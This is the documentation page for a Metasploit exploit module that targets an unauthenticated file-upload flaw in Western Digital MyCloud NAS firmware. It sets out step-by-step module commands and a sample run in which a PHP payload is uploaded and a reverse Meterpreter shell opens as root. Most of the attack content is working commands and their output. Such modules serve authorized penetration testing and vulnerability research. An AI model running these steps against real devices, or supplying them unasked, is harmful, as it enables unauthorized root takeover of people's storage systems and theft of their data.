Zenofex
1.7 KiB
1.7 KiB
Description
This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.
Vulnerable Application
Western Digital designs drives and network attached storage (NAS) devices for both consumers and businesses.
This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .
Verification Steps
- Do:
use exploit/linux/http/wd_mycloud_multiupload_upload - Do:
set RHOST [IP] - Do:
check - It should be reported as vulnerable
- Do:
run - You should get a shell
Scenarios
msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run
[*] Started reverse TCP handler on 192.168.86.215:4444
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php
meterpreter > getuid
Server username: root (0)